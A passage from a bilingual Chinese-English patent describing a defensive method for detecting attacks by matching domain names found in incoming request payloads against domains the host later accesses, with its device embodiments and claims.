在一种可能的实现方式中，所述若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则所述处理模块502，用于：若所述至少一个域名包括所述第一域名、所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻、且所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值，则产生所述告警信息。In a possible implementation, if the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than when the host receives the third domain name, At the time of a request message, the processing module 502 is configured to: if the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than that of the host The difference between the time when the first request message is received and the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to the preset time threshold, the alarm information is generated.

在一种可能的实现方式中，所述检测设备集成于所述主机中，所述获取模块501，用于：通过挂钩hook网络函数，获取所述主机的网络日志；通过hook操作***中的shell执行过程，获取所述主机的主机日志。In a possible implementation, the detection device is integrated into the host, and the acquisition module 501 is used to: obtain the network log of the host by hooking a network function; and acquire the network log of the host by hooking a shell in the operating system Execute the process to obtain the host log of the host.

在一种可能的实现方式中，所述检测设备是与所述主机存在网络连接的另一独立计算机设备，所述获取模块501，用于：接收安全设备发送的所述网络日志，所述安全设备部署于所述其他设备与所述主机之间；接收所述主机发送的所述主机日志。In a possible implementation, the detection device is another independent computer device that has a network connection with the host. The acquisition module 501 is configured to: receive the network log sent by the security device. A device is deployed between the other device and the host; receives the host log sent by the host.

在一种可能的实现方式中，所述处理模块502还用于：输出所述告警信息。In a possible implementation, the processing module 502 is also configured to: output the alarm information.

在又一个示例中，图5所示的检测装置500，集成于主机中，对于这种情况：In yet another example, the detection device 500 shown in Figure 5 is integrated into the host. In this case:

所述获取模块501，用于获取所述主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；所述获取模块501还用于，获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名；处理模块502，用于若所述至少一个域名包括所述第一域名，则产生告警信息，所述告警信息用于指示所述主机被攻击。The acquisition module 501 is used to obtain the network log of the host. The network log includes parameter information of a first request message. The first request message is a request message received by the host from other devices. , the parameter information includes the first domain name included in the payload part of the first request message; the obtaining module 501 is also used to obtain the host log of the host, where the host log includes the host accessed by the host. At least one domain name; the processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, and the alarm information is used to indicate that the host is attacked.

在一种可能的实现方式中，所述获取模块501，用于通过挂钩hook网络函数，获取所述主机的网络日志，以及通过hook操作***中的shell执行过程，获取所述主机的主机日志。In a possible implementation, the acquisition module 501 is configured to acquire the network log of the host by hooking a network function, and acquire the host log of the host by hooking the shell execution process in the operating system.

由于所述检测装置500是与以上方法实施例提供的检测攻击的方法对应的装置，所述装置500的各个单元的具体实现，均与以上方法实施例为同一构思，因此，关于所述装置500的各个单元的具体实现，可以参考以上方法实施例的描述部分，此处不再赘述。Since the detection device 500 is a device corresponding to the attack detection method provided in the above method embodiments, the specific implementation of each unit of the device 500 is the same concept as the above method embodiments. Therefore, regarding the device 500 For the specific implementation of each unit, please refer to the description part of the above method embodiment, which will not be described again here.

需要说明的是，前述提及的检测装置500，其硬件结构可以为如图6所示的结构，图6为本申请实施例提供的一种设备的结构示意图。It should be noted that the hardware structure of the aforementioned detection device 500 may be as shown in Figure 6. Figure 6 is a schematic structural diagram of a device provided by an embodiment of the present application.

请参阅图6所示，设备600包括：处理器610、通信接口620和和存储器630。其中设备600中的处理器610的数量可以是一个或多个，图6中以一个处理器为例。本申请实施例中，处理器610、通信接口620和存储器630可通过总线***或其它方式连接，其中，图6中以通过总线***640连接为例。Referring to FIG. 6 , the device 600 includes: a processor 610 , a communication interface 620 and a memory 630 . The number of processors 610 in the device 600 may be one or more. In FIG. 6 , one processor is taken as an example. In this embodiment of the present application, the processor 610, the communication interface 620 and the memory 630 may be connected through a bus system or other means. In FIG. 6, the connection through the bus system 640 is taken as an example.

处理器610可以是中央处理器(central processing unit，CPU)，网络处理器(network processor，NP)或者CPU和NP的组合。处理器610还可以进一步包括硬件芯片。上述硬件芯片可以是专用集成电路(application-specific integrated circuit，ASIC)，可编程逻辑器件(programmable logic device，PLD)或其组合。上述PLD可以是复杂可编程逻辑器件(complex programmable logic device，CPLD)，现场可编程逻辑门阵列(field-programmable gate array，FPGA)，通用阵列逻辑(generic array logic,GAL)或其任意组合。The processor 610 may be a central processing unit (CPU), a network processor (NP), or a combination of CPU and NP. The processor 610 may further include hardware chips. The above-mentioned hardware chip can be an application-specific integrated circuit (ASIC), a programmable logic device (PLD) or a combination thereof. The above-mentioned PLD can be a complex programmable logic device (CPLD), a field-programmable gate array (FPGA), a general array logic (GAL) or any combination thereof.

存储器630可以包括易失性存储器(英文：volatile memory)，例如随机存取存储器(random-access memory，RAM)；存储器630也可以包括非易失性存储器(英文：non-volatile memory)，例如快闪存储器(英文：flash memory)，硬盘(hard disk drive，HDD)或固态硬盘(solid-state drive，SSD)；存储器630还可以包括上述种类的存储器的组合。存储器630例如能够存储主机的网络日志和主机的主机日志。The memory 630 may include volatile memory (English: volatile memory), such as random-access memory (RAM); the memory 630 may also include non-volatile memory (English: non-volatile memory), such as fast memory. Flash memory (English: flash memory), hard disk drive (HDD) or solid state hard drive Disk (solid-state drive, SSD); the memory 630 may also include a combination of the above types of memory. The memory 630 can store, for example, the network log of the host and the host log of the host.

可选地，存储器630存储有操作***和程序、可执行模块或者数据结构，或者它们的子集，或者它们的扩展集，其中，程序可包括各种操作指令，用于实现各种操作。操作***可包括各种***程序，用于实现各种基础业务以及处理基于硬件的任务。处理器610可以读取存储器630中的程序，实现本申请实施例提供的检测攻击的方法。Optionally, the memory 630 stores an operating system and programs, executable modules or data structures, or a subset thereof, or an extended set thereof, where the program may include various operating instructions for implementing various operations. The operating system may include various system programs that are used to implement various basic services and handle hardware-based tasks. The processor 610 can read the program in the memory 630 to implement the attack detection method provided by the embodiment of the present application.

总线***640可以是外设部件互连标准(peripheral component interconnect，PCI)总线或扩展工业标准结构(extended industry standard architecture，EISA)总线等。总线***640可以分为地址总线、数据总线、控制总线等。为便于表示，图6中仅用一条粗线表示，但并不表示仅有一根总线或一种类型的总线。The bus system 640 may be a peripheral component interconnect (PCI) bus or an extended industry standard architecture (EISA) bus, etc. The bus system 640 can be divided into an address bus, a data bus, a control bus, etc. For ease of presentation, only one thick line is used in Figure 6, but it does not mean that there is only one bus or one type of bus.

本申请实施例还提供了一种计算机可读存储介质，包括指令或计算机程序，当其在计算机上运行时，使得计算机执行以上实施例提供的检测攻击的方法。Embodiments of the present application also provide a computer-readable storage medium, which includes instructions or computer programs that, when run on a computer, cause the computer to execute the method for detecting attacks provided in the above embodiments.

本申请实施例还提供了一种包含指令或计算机程序的计算机程序产品，当其在计算机上运行时，使得计算机执行以上实施例提供的检测攻击的方法。Embodiments of the present application also provide a computer program product containing instructions or computer programs that, when run on a computer, cause the computer to execute the method for detecting attacks provided in the above embodiments.

本申请的说明书和权利要求书及上述附图中的术语“第一”、“第二”、“第三”、“第四”等(如果存在)是用于区别类似的对象，而不必用于描述特定的顺序或先后次序。应该理解这样使用的数据在适当情况下可以互换，以便这里描述的实施例能够以除了在这里图示或描述的内容以外的顺序实施。此外，术语“包括”和“具有”以及他们的任何变形，意图在于覆盖不排他的包含，例如，包含了一系列步骤或单元的过程、方法、***、产品或设备不必限于清楚地列出的那些步骤或单元，而是可包括没有清楚地列出的或对于这些过程、方法、产品或设备固有的其它步骤或单元。The terms "first", "second", "third", "fourth", etc. (if present) in the description and claims of this application and the above-mentioned drawings are used to distinguish similar objects without necessarily using Used to describe a specific order or sequence. It is to be understood that the data so used are interchangeable under appropriate circumstances so that the embodiments described herein can be practiced in sequences other than those illustrated or described herein. In addition, the terms "including" and "having" and any variations thereof are intended to cover non-exclusive inclusions, e.g., a process, method, system, product, or apparatus that encompasses a series of steps or units and need not be limited to those explicitly listed. Those steps or elements may instead include other steps or elements not expressly listed or inherent to the process, method, product or apparatus.

所属领域的技术人员可以清楚地了解到，为描述的方便和简洁，上述描述的***，装置和单元的具体工作过程，可以参考前述方法实施例中的对应过程，在此不再赘述。Those skilled in the art can clearly understand that for the convenience and simplicity of description, the specific working processes of the systems, devices and units described above can be referred to the corresponding processes in the foregoing method embodiments, and will not be described again here.

在本申请所提供的几个实施例中，应该理解到，所揭露的***，装置和方法，可以通过其它的方式实现。例如，以上所描述的装置实施例仅仅是示意性的，例如，单元的划分，仅仅为一种逻辑业务划分，实际实现时可以有另外的划分方式，例如多个单元或组件可以结合或者可以集成到另一个***，或一些特征可以忽略，或不执行。另一点，所显示或讨论的相互之间的耦合或直接耦合或通信连接可以是通过一些接口，装置或单元的间接耦合或通信连接，可以是电性，机械或其它的形式。In the several embodiments provided in this application, it should be understood that the disclosed systems, devices and methods can be implemented in other ways. For example, the device embodiments described above are only illustrative. For example, the division of units is only a logical service division. In actual implementation, there may be other division methods. For example, multiple units or components may be combined or integrated. to another system, or some features can be ignored, or not implemented. On the other hand, the coupling or direct coupling or communication connection between each other shown or discussed may be through some interfaces, and the indirect coupling or communication connection of the devices or units may be in electrical, mechanical or other forms.

作为分离部件说明的单元可以是或者也可以不是物理上分开的，作为单元显示的部件可以是或者也可以不是物理单元，即可以位于一个地方，或者也可以分布到多个网络单元上。可以根据实际的需要选择其中的部分或者全部单元来实现本实施例方案的目的。A unit described as a separate component may or may not be physically separate. A component shown as a unit may or may not be a physical unit, that is, it may be located in one place, or it may be distributed to multiple network units. Some or all of the units can be selected according to actual needs to achieve the purpose of the solution of this embodiment.

另外，在本申请各个实施例中的各业务单元可以集成在一个处理单元中，也可以是各个单元单独物理存在，也可以两个或两个以上单元集成在一个单元中。上述集成的单元既可以采用硬件的形式实现，也可以采用软件业务单元的形式实现。In addition, each business unit in various embodiments of this application may be integrated into one processing unit, or each unit may exist physically alone, or two or more units may be integrated into one unit. The above integrated units can be implemented in the form of hardware or software business units.

集成的单元如果以软件业务单元的形式实现并作为独立的产品销售或使用时，可以存储在一个计算机可读取存储介质中。基于这样的理解，本申请的技术方案本质上或者说对现有技术做出贡献的部分或者该技术方案的全部或部分可以以软件产品的形式体现出来，该计算机软件产品存储在一个存储介质中，包括若干指令用以使得一台计算机设备(可以是个人计算机，服务器，或者网络设备等)执行本申请各个实施例方法的全部或部分步骤。而前述的存储介质包括：U盘、移动硬盘、只读存储器(ROM，Read-Only Memory)、随机存取存储器(RAM，Random Access Memory)、磁碟或者光盘等各种可以存储程序代码的介质。Integrated units can exist if they are implemented in the form of software business units and sold or used as independent products. Stored in a computer-readable storage medium. Based on this understanding, the technical solution of the present application is essentially or contributes to the existing technology, or all or part of the technical solution can be embodied in the form of a software product, and the computer software product is stored in a storage medium , including several instructions to cause a computer device (which may be a personal computer, a server, or a network device, etc.) to execute all or part of the steps of the methods of various embodiments of the present application. The aforementioned storage media include: U disk, mobile hard disk, read-only memory (ROM, Read-Only Memory), random access memory (RAM, Random Access Memory), magnetic disk or optical disk and other media that can store program code. .

本领域技术人员应该可以意识到，在上述一个或多个示例中，本发明所描述的业务可以用硬件、软件、固件或它们的任意组合来实现。当使用软件实现时，可以将这些业务存储在计算机可读介质中或者作为计算机可读介质上的一个或多个指令或代码进行传输。计算机可读介质包括计算机存储介质和通信介质，其中通信介质包括便于从一个地方向另一个地方传送计算机程序的任何介质。存储介质可以是通用或专用计算机能够存取的任何可用介质。Those skilled in the art should realize that in one or more of the above examples, the services described in the present invention can be implemented using hardware, software, firmware, or any combination thereof. When implemented using software, these services may be stored on or transmitted as one or more instructions or code on a computer-readable medium. Computer-readable media includes computer storage media and communication media including any medium that facilitates transfer of a computer program from one place to another. Storage media can be any available media that can be accessed by a general purpose or special purpose computer.

以上的具体实施方式，对本发明的目的、技术方案和有益效果进行了进一步详细说明，所应理解的是，以上仅为本发明的具体实施方式而已。The above specific embodiments further describe the objectives, technical solutions and beneficial effects of the present invention in detail. It should be understood that the above are only specific embodiments of the present invention.

以上，以上实施例仅用以说明本申请的技术方案，而非对其限制；尽管参照前述实施例对本申请进行了详细的说明，本领域的普通技术人员应当理解：其依然可以对前述各实施例所记载的技术方案进行修改，或者对其中部分技术特征进行等同替换；而这些修改或者替换，并不使相应技术方案的本质脱离本申请各实施例技术方案的范围。 Above, the above embodiments are only used to illustrate the technical solution of the present application, but not to limit it. Although the present application has been described in detail with reference to the foregoing embodiments, those of ordinary skill in the art should understand that they can still implement the above-mentioned implementations. The technical solutions described in the examples are modified, or some of the technical features are equivalently replaced; and these modifications or substitutions do not cause the essence of the corresponding technical solutions to deviate from the scope of the technical solutions in the embodiments of the present application.

Claims

一种检测攻击的方法，其特征在于，应用于检测设备，所述方法包括：A method for detecting attacks, characterized in that it is applied to detecting equipment, and the method includes:

获取主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是所述主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；Obtain the network log of the host. The network log includes parameter information of the first request message. The first request message is a request message from other devices received by the host. The parameter information includes the The first domain name included in the payload part of the first request message;

获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名；Obtain the host log of the host, where the host log includes at least one domain name accessed by the host;

若所述至少一个域名包括所述第一域名，则产生告警信息，所述告警用于指示所述主机被攻击。If the at least one domain name includes the first domain name, alarm information is generated, and the alarm is used to indicate that the host is attacked.
根据权利要求1所述的方法，其特征在于，所述参数信息还包括所述主机接收到所述第一请求报文的时刻，所述主机日志还包括所述至少一个域名中每个域名分别对应的时刻，其中，所述主机日志中的第二域名对应的时刻为所述主机访问所述第二域名的时刻，所述至少一个域名包括所述第二域名。The method according to claim 1, characterized in that the parameter information also includes the time when the host receives the first request message, and the host log further includes the respective domain names of each domain name in the at least one domain name. The corresponding time, wherein the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
根据权利要求2所述的方法，其特征在于，所述若所述至少一个域名包括所述第一域名，则产生告警信息，包括：The method according to claim 2, characterized in that if the at least one domain name includes the first domain name, alarm information is generated, including:

若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则产生所述告警信息。If the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, then the Alarm information.
根据权利要求3所述的方法，其特征在于，所述若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则产生所述告警信息，包括：The method of claim 3, wherein if the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than when the host receives When the first request message is received, the alarm information is generated, including:

若所述至少一个域名包括所述第一域名、所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻、且所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值，则产生所述告警信息。If the at least one domain name includes the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the host log If the difference between the time corresponding to the first domain name included in and the time when the host receives the first request message is less than or equal to the preset time threshold, the alarm information is generated.
根据权利要求1-4任一所述的方法，其特征在于，所述检测设备集成于所述主机中，所述获取主机的网络日志，包括：The method according to any one of claims 1 to 4, characterized in that the detection device is integrated in the host, and the obtaining the network log of the host includes:

通过挂钩hook网络函数，获取所述主机的网络日志；Obtain the network log of the host by hooking the hook network function;

所述获取所述主机的主机日志，包括：The obtaining the host log of the host includes:

通过hook操作***中的shell执行过程，获取所述主机的主机日志。Obtain the host log of the host by hooking the shell execution process in the operating system.
根据权利要求1-4任一所述的方法，其特征在于，所述检测设备是与所述主机存在网络连接的另一独立计算机设备，所述获取主机的网络日志，包括：The method according to any one of claims 1 to 4, characterized in that the detection device is another independent computer device with a network connection to the host, and the obtaining the network log of the host includes:

接收安全设备发送的所述网络日志，所述安全设备部署于所述其他设备与所述主机之间；Receive the network log sent by a security device deployed between the other device and the host;

所述获取所述主机的主机日志，包括：The obtaining the host log of the host includes:

接收所述主机发送的所述主机日志。Receive the host log sent by the host.
根据权利要求6所述的方法，其特征在于，所述检测设备、所述安全设备以及所述主机位于同一局域网内。The method according to claim 6, characterized in that the detection device, the security device and the host are located in the same local area network.
根据权利要求6所述的方法，其特征在于，所述检测设备部署于互联网中。The method according to claim 6, characterized in that the detection device is deployed in the Internet.
根据权利要求1所述的方法，其特征在于，所述参数信息还包括所述载荷部分和/或所述第一请求报文的目的因特网协议IP地址，所述告警信息还包括所述参数信息中所包括的所述载荷部分和/或所述第一请求报文的目的IP地址。The method according to claim 1, characterized in that the parameter information further includes the load part and/or The destination Internet Protocol IP address of the first request message, and the alarm information also includes the payload part included in the parameter information and/or the destination IP address of the first request message.
根据权利要求1或9所述的方法，其特征在于，所述主机日志还包括所述主机的IP地址和/或所述至少一个域名中每个域名分别对应的日志记录，所述告警信息还包括所述主机日志中所包括的所述主机的IP地址和/或所述第一域名对应的日志记录。The method according to claim 1 or 9, characterized in that the host log further includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name, and the alarm information also includes Including log records corresponding to the IP address of the host and/or the first domain name included in the host log.
一种检测攻击的***，其特征在于，所述***包括：安全设备、主机和检测设备；A system for detecting attacks, characterized in that the system includes: a security device, a host and a detection device;

所述安全设备，用于将所述主机的网络日志发送给所述检测设备，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是主机接收到的来自其它设备的报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；The security device is configured to send the network log of the host to the detection device. The network log includes parameter information of a first request message. The first request message is received by the host from other Device message, the parameter information includes the first domain name included in the payload part of the first request message;

所述主机，用于将所述主机的主机日志发送给所述检测设备，所述主机日志包括所述主机访问的至少一个域名；The host is configured to send the host log of the host to the detection device, where the host log includes at least one domain name accessed by the host;

所述检测设备，用于接收所述安全设备发送的所述网络日志、以及接收所述主机发送的所述主机日志，并在所述至少一个域名包括所述第一域名的情况下，则产生告警信息，所述告警用于指示所述主机被攻击。The detection device is configured to receive the network log sent by the security device and the host log sent by the host, and when the at least one domain name includes the first domain name, generate Alarm information, the alarm is used to indicate that the host is under attack.
根据权利要求11所述的***，其特征在于，所述参数信息还包括所述主机接收到所述第一请求报文的时刻，所述主机日志还包括所述至少一个域名中每个域名分别对应的时刻，其中，所述主机日志中的第二域名对应的时刻，为所述主机访问所述第二域名的时刻，所述至少一个域名包括所述第二域名。The system according to claim 11, wherein the parameter information also includes the time when the host receives the first request message, and the host log further includes the respective domain names of each domain name in the at least one domain name. The corresponding time, wherein the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
根据权利要求12所述的***，其特征在于，所述检测设备用于：The system according to claim 12, characterized in that the detection device is used for:

在所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻的情况下，产生所述告警信息。In the case that the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, a The alarm information.
根据权利要求13所述的***，其特征在于，所述检测设备用于：The system according to claim 13, characterized in that the detection device is used for:

在所述至少一个域名包括所述第一域名、所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻、且所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值的情况下，产生所述告警信息。When the at least one domain name includes the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the host log When the difference between the time corresponding to the first domain name included in and the time when the host receives the first request message is less than or equal to the preset time threshold, the alarm information is generated.
根据权利要求11-14任意一项所述的***，其特征在于，所述主机通过hook操作***中的shell执行过程，获取所述主机的主机日志。The system according to any one of claims 11 to 14, characterized in that the host obtains the host log of the host by hooking a shell execution process in the operating system.
根据权利要求11-15任意一项所述的***，其特征在于，所述检测设备、所述安全设备以及所述主机位于同一局域网内。The system according to any one of claims 11-15, characterized in that the detection device, the security device and the host are located in the same local area network.
根据权利要求11-15任意一项所述的***，其特征在于，所述检测设备部署于互联网中。The system according to any one of claims 11-15, characterized in that the detection device is deployed in the Internet.
一种检测装置，其特征在于，所述检测装置集成于主机中，所述检测装置包括：A detection device, characterized in that the detection device is integrated in the host machine, and the detection device includes:

获取模块，用于获取所述主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；An acquisition module, configured to acquire the network log of the host. The network log includes parameter information of a first request message. The first request message is a request message received by the host from other devices. The parameter information includes the first domain name included in the payload part of the first request message;

所述获取模块还用于，获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名； The acquisition module is also configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host;

处理模块，用于若所述至少一个域名包括所述第一域名，则产生告警信息，所述告警信息用于指示所述主机被攻击。A processing module configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm information is used to indicate that the host is attacked.
根据权利要求18所述的检测装置，其特征在于，所述获取模块，用于通过挂钩hook网络函数，获取所述主机的网络日志，以及通过hook操作***中的shell执行过程，获取所述主机的主机日志。The detection device according to claim 18, characterized in that the acquisition module is used to acquire the network log of the host by hooking a network function, and acquire the host by hooking a shell execution process in the operating system. host logs.
一种检测装置，其特征在于，应用于检测设备，所述装置包括：A detection device, characterized in that it is applied to detection equipment, and the device includes:

获取模块，用于获取主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是所述主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；Obtaining module, used to obtain the network log of the host. The network log includes parameter information of the first request message. The first request message is a request message from other devices received by the host. The parameter information includes the first domain name included in the payload part of the first request message;

所述获取模块，还用于获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名；The acquisition module is also used to obtain the host log of the host, where the host log includes at least one domain name accessed by the host;

处理模块，用于若所述至少一个域名包括所述第一域名，则产生告警信息，所述告警用于指示所述主机被攻击。A processing module, configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm is used to indicate that the host is attacked.
根据权利要求20所述的装置，其特征在于，所述参数信息还包括所述主机接收到所述第一请求报文的时刻，所述主机日志还包括所述至少一个域名中每个域名分别对应的时刻，其中，所述主机日志中的第二域名对应的时刻为所述主机访问所述第二域名的时刻，所述至少一个域名包括所述第二域名。The device according to claim 20, wherein the parameter information further includes the time when the host receives the first request message, and the host log further includes the respective domain names of each domain name in the at least one domain name. The corresponding time, wherein the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
根据权利要求21所述的装置，其特征在于，所述若所述至少一个域名包括所述第一域名，则所述处理模块，用于：The device according to claim 21, wherein if the at least one domain name includes the first domain name, the processing module is configured to:

若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则产生所述告警信息。If the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, then the Alarm information.
根据权利要求22所述的装置，其特征在于，所述若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则所述处理模块，用于：The device according to claim 22, wherein if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than when the host receives At the time of the first request message, the processing module is used to:

若所述至少一个域名包括所述第一域名、所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻、且所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值，则产生所述告警信息。If the at least one domain name includes the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the host log If the difference between the time corresponding to the first domain name included in and the time when the host receives the first request message is less than or equal to the preset time threshold, the alarm information is generated.
根据权利要求20-23任一所述的装置，其特征在于，所述检测设备是与所述主机存在网络连接的另一独立计算机设备，所述获取模块，用于：The device according to any one of claims 20 to 23, characterized in that the detection device is another independent computer device connected to the host through a network, and the acquisition module is used to:

接收安全设备发送的所述网络日志，所述安全设备部署于所述其他设备与所述主机之间；Receive the network log sent by a security device deployed between the other device and the host;

接收所述主机发送的所述主机日志。Receive the host log sent by the host.
根据权利要求24所述的装置，其特征在于，所述检测设备、所述安全设备以及所述主机位于同一局域网内。The device according to claim 24, characterized in that the detection device, the security device and the host are located in the same local area network.
根据权利要求24所述的装置，其特征在于，所述检测设备部署于互联网中。The device according to claim 24, characterized in that the detection device is deployed in the Internet.
一种设备，其特征在于，包括：处理器和存储器；A device, characterized by including: a processor and a memory;

所述存储器，用于存储指令或计算机程序； The memory is used to store instructions or computer programs;

所述处理器，用于执行所述指令或计算机程序，执行权利要求1-10任意一项所述的方法。The processor is configured to execute the instructions or computer program to perform the method described in any one of claims 1-10.
一种计算机可读存储介质，其特征在于，包括指令或计算机程序，当其在计算机上运行时，使得计算机执行以上权利要求1-10任意一项所述的方法。A computer-readable storage medium, characterized in that it includes instructions or computer programs that, when run on a computer, cause the computer to perform the method described in any one of claims 1-10 above.
一种计算机程序产品，其特征在于，包括计算机程序，当所述计算机程序在处理器上运行时，实现权利要求1-10任意一项所述的方法。 A computer program product, characterized by comprising a computer program that implements the method described in any one of claims 1-10 when the computer program is run on a processor.